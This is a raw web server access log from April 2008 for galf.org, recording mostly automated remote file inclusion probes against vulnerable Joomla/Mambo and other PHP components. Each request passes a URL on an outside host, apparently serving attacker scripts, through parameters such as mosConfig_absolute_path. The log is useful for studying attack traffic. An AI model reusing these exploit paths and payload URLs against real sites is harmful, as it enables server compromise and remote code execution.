160.99.12.231 - - [14/Apr/2008:06:01:08 -0700] "GET /logs/access_070806.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:08 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.138.144 - - [14/Apr/2008:06:01:17 -0700] "GET /logs/access.log/index.php?nic=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:44 -0700] "GET /logs/access_071217.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:46 -0700] "GET /logs/access_071217.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:56 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:01:57 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.134.249.164 - - [14/Apr/2008:06:02:41 -0700] "GET /logs/access_080113.log//index.php?content=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.134.249.164 - - [14/Apr/2008:06:02:41 -0700] "GET //index.php?content=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.134.249.164 - - [14/Apr/2008:06:02:41 -0700] "GET /logs//index.php?content=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:03:04 -0700] "GET /logs/access_080317.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:03:07 -0700] "GET /logs/access_080317.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:03:57 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:03:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:03:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:04:05 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:04:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:04:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
60.249.42.221 - - [14/Apr/2008:06:04:11 -0700] "GET /logs/access_080114.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:04:14 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:04:15 -0700] "GET /logs/access_070910.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:04:15 -0700] "GET /logs/access_070910.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.67.120.48 - - [14/Apr/2008:06:04:20 -0700] "GET /logs/access_070716.log/index.php?go=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
60.249.42.221 - - [14/Apr/2008:06:04:21 -0700] "GET /index.php?go=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
60.249.42.221 - - [14/Apr/2008:06:04:23 -0700] "GET /logs/index.php?go=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.248.10 - - [14/Apr/2008:06:04:33 -0700] "GET //kernel/loadkernel.php?installPath=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
204.15.248.10 - - [14/Apr/2008:06:04:33 -0700] "GET /logs//kernel/loadkernel.php?installPath=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:10 -0700] "GET /logs/access_071210.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:11 -0700] "GET /logs/access_071210.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:18 -0700] "GET /logs/access_071105.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:19 -0700] "GET /logs/access_071105.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:22 -0700] "GET /logs/access_071015.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:23 -0700] "GET /logs/access_071015.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.112.193.46 - - [14/Apr/2008:06:05:27 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.193.46 - - [14/Apr/2008:06:05:27 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.144.229.170 - - [14/Apr/2008:06:05:37 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.144.229.170 - - [14/Apr/2008:06:05:37 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.144.229.170 - - [14/Apr/2008:06:05:37 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:41 -0700] "GET /logs/access_070827.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:05:45 -0700] "GET /logs/access_070827.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:06:29 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:06:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:06:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:06:40 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.224.17 - - [14/Apr/2008:06:08:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [14/Apr/2008:06:08:23 -0700] "GET / HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
208.71.129.241 - - [14/Apr/2008:06:08:25 -0700] "GET //?mosConfig_absolute_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
208.71.129.241 - - [14/Apr/2008:06:08:25 -0700] "GET /logs//?mosConfig_absolute_path=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 200 7235 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
82.198.80.33 - - [14/Apr/2008:06:09:03 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
82.198.80.33 - - [14/Apr/2008:06:09:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
82.198.80.33 - - [14/Apr/2008:06:09:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:10:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:06:11:05 -0700] "GET /logs/access_071008.log//index.php?loc=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:06:11:05 -0700] "GET //index.php?loc=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:06:11:05 -0700] "GET /logs//index.php?loc=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.227 - - [14/Apr/2008:06:11:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.227 - - [14/Apr/2008:06:11:57 -0700] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:12:28 -0700] "GET /logs/access_080324.log/send_reminders.php?noSet=0&includedir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.67.120.48 - - [14/Apr/2008:06:12:50 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.67.120.48 - - [14/Apr/2008:06:12:52 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
60.249.42.221 - - [14/Apr/2008:06:12:58 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.69.224.10 - - [14/Apr/2008:06:13:29 -0700] "GET /logs/access.log/index.php?x=http://blumade.it/gestione/selops/dosa.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Apr/2008:06:13:31 -0700] "GET /index.php?x=http://blumade.it/gestione/selops/dosa.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Apr/2008:06:13:33 -0700] "GET /logs/index.php?x=http://blumade.it/gestione/selops/dosa.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:09 -0700] "GET /logs/access_071231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:09 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:09 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.79.244.216 - - [14/Apr/2008:06:15:13 -0700] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
77.79.244.216 - - [14/Apr/2008:06:15:13 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:25 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:25 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:15:25 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.198.80.33 - - [14/Apr/2008:06:16:38 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
82.198.80.33 - - [14/Apr/2008:06:16:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
82.198.80.33 - - [14/Apr/2008:06:16:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
72.3.232.30 - - [14/Apr/2008:06:16:53 -0700] "GET /logs/access_080303.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:16:53 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:16:53 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:17:07 -0700] "GET /logs/access_080114.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.144.229.170 - - [14/Apr/2008:06:17:25 -0700] "GET /logs/access_080303.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.144.229.170 - - [14/Apr/2008:06:17:25 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.144.229.170 - - [14/Apr/2008:06:17:25 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.144.229.170 - - [14/Apr/2008:06:17:41 -0700] "GET /logs/access_080114.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.212.23.249 - - [14/Apr/2008:06:17:42 -0700] "GET /admin.php?include_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
66.212.23.249 - - [14/Apr/2008:06:17:43 -0700] "GET /logs/admin.php?include_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
65.69.224.10 - - [14/Apr/2008:06:17:55 -0700] "GET /logs/access_070806.log/index.php?x=http://blumade.it/gestione/selops/dosa.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [14/Apr/2008:06:19:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
205.234.253.11 - - [14/Apr/2008:06:19:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:20:13 -0700] "GET /logs/access_071008.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:20:19 -0700] "GET /logs/access_070820.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.104.37.122 - - [14/Apr/2008:06:20:23 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
216.104.37.122 - - [14/Apr/2008:06:20:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
160.99.12.231 - - [14/Apr/2008:06:20:57 -0700] "GET /logs/access_070903.log//components/com_simpleboard/image_upload.php?sbp=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:21:34 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.232.30 - - [14/Apr/2008:06:21:34 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.67.120.48 - - [14/Apr/2008:06:22:44 -0700] "GET /logs/access_071210.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.167.156.20 - - [14/Apr/2008:06:22:44 -0700] "GET //index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
216.167.156.20 - - [14/Apr/2008:06:22:44 -0700] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
201.134.249.164 - - [14/Apr/2008:06:23:30 -0700] "GET /logs/access.log//index.php?content=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
60.249.45.142 - - [14/Apr/2008:06:24:16 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.67.120.48 - - [14/Apr/2008:06:24:18 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:16 -0700] "GET /logs/access_070806.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:16 -0700] "GET /logs/access_070806.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:16 -0700] "GET //com_articles.php?absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:16 -0700] "GET //com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:17 -0700] "GET /logs//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:17 -0700] "GET /logs//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:30 -0700] "GET /logs/access_070730.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:26:30 -0700] "GET /logs/access_070730.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.69.254.243 - - [14/Apr/2008:06:27:31 -0700] "GET /logs/access_070917.loghttp://workersparty.chat.ru/images? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
67.69.254.244 - - [14/Apr/2008:06:27:41 -0700] "GET /logs/access_070917.loghttp://workersparty.chat.ru/images? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
60.249.45.142 - - [14/Apr/2008:06:27:46 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
60.249.45.142 - - [14/Apr/2008:06:27:48 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://logistics.vec.go.th/cvrl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.69.254.243 - - [14/Apr/2008:06:27:52 -0700] "GET /logs/access_070716.loghttp://workersparty.chat.ru/images? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:27:58 -0700] "GET /logs/access_070917.log/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:27:58 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:27:58 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
